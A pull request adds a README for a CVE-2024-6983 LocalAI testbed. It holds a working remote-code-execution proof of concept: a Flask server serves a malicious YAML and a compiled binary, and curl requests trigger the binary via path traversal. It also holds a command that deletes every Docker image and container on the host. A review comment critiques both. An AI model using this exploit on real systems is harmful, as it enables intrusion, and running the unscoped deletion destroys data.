Add CVE-2024-6983 #109

Open
wants to merge 1 commit into
base: main
86 changes: 86 additions & 0 deletions mudler/localai/CVE-2024-6983/README.md
@@ -0,0 +1,86 @@
# Mudler/LocalAI CVE-2024-6983

This directory contains the deployment config for LocalAI instances vulnerable and fixed to CVE-2024-6983. LocalAI versions below 2.19.4 are vulnerable to that remote code execution vulnerability.

## How to Trigger the Vulnerability?

To trigger the vulnerability, you can use the following two curl commands and the provided Python Script. You may need to install Flask and PyInstaller via pip. Since this vulnerability requires hosting a YAML and an ELF file, the provided Python script will host these files. In a vulnerable environment, after the second curl request, you can see the created file under the /tmp/ directory.

Python Script:

```
from flask import Flask,send_file,request
import tempfile
import PyInstaller.__main__
import os

app=Flask(__name__)

CONF="""name: "life"

download_files:
- filename: "app.bin"
uri: "{0}app.bin"
"""

# Builds exploit code
def build():
CODE = 'open("/tmp/test.txt","a").write("1337")' # Python code we want to run
appname="app.bin"
if os.path.isfile(appname):
return appname
with tempfile.NamedTemporaryFile(delete=False) as fp:
fp.write(CODE.encode())
fp.close()
PyInstaller.__main__.run(["--onefile","--clean","--workpath","/tmp/build/","--specpath","/tmp","--distpath",".","-n",appname,fp.name])
return appname

# Serve model.yaml file
@app.get("/model.yaml")
def model():
return CONF.format(request.root_url)

# Serve app.bin file
@app.get("/app.bin")
def files():
return send_file(build())

# Start the server
app.run("0.0.0.0",8000)
```

Curl Requests:

```
# Run above Python script first.
python server.py

# Upload the yaml and compiled Python file
curl http://localhost:8080/models/apply -X POST -H "Content-Type: application/json" -d '{"name":"life","config_url":"http://localhost:8000/model.yaml","id":""}'

# Trigger the uploaded app.bin file via the backend parameter.
curl http://localhost:8080/embeddings -X POST -H "Content-Type: application/json" -d '{"backend":"../../../../../../build/models/app.bin","model":"life","input":"hi"}'

# Validate the created file by checking the docker inside.
docker exec -it local-ai bash --> ls /tmp/
```

In case you cannot trigger the vulnerability, you might need to delete your existing container images because Docker might try to reuse them.

```
sudo docker rmi -f $(sudo docker images -aq)
sudo docker remove $(sudo docker ps -a -q)
```
## Fixed version
```
docker run -p 8080:8080 -e "DEBUG=true" --name local-ai --network host -ti localai/localai:v2.19.4-ffmpeg-core
```

The deployed service listens on `localhost:8080` after the docker completes its job.

## Vulnerable version
```
docker run -p 8080:8080 -e "DEBUG=true" --name local-ai --network host -ti localai/localai:v2.14.0-ffmpeg-core
```

The deployed service listens on `localhost:8080` after the docker completes its job.
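
Review bot: The cleanup block after "In case you cannot trigger the vulnerability" deletes every image and every container on the host (`sudo docker rmi -f $(sudo docker images -aq)`), not only the LocalAI ones. Scope it to this testbed, for example `docker rm -f local-ai` followed by `docker rmi localai/localai:v2.14.0-ffmpeg-core`. In both `docker run` lines, `-p 8080:8080` is discarded when combined with `--network host`, and host networking puts the deliberately vulnerable instance on every host interface. Either drop `-p` and state that the testbed belongs on an isolated machine, or document why host networking is needed (the container fetching `http://localhost:8000/model.yaml`). For the same reason `app.run("0.0.0.0",8000)` could bind to `127.0.0.1`, since the curl commands only use localhost. The validation line `docker exec -it local-ai bash --> ls /tmp/` is not a runnable command; `docker exec local-ai ls /tmp/` does what its comment describes. Smaller points: the opening sentence "vulnerable and fixed to CVE-2024-6983" reads awkwardly, the script is only named `server.py` inside the curl block, the fences carry no language tag, and a blank line is missing before "## Fixed version".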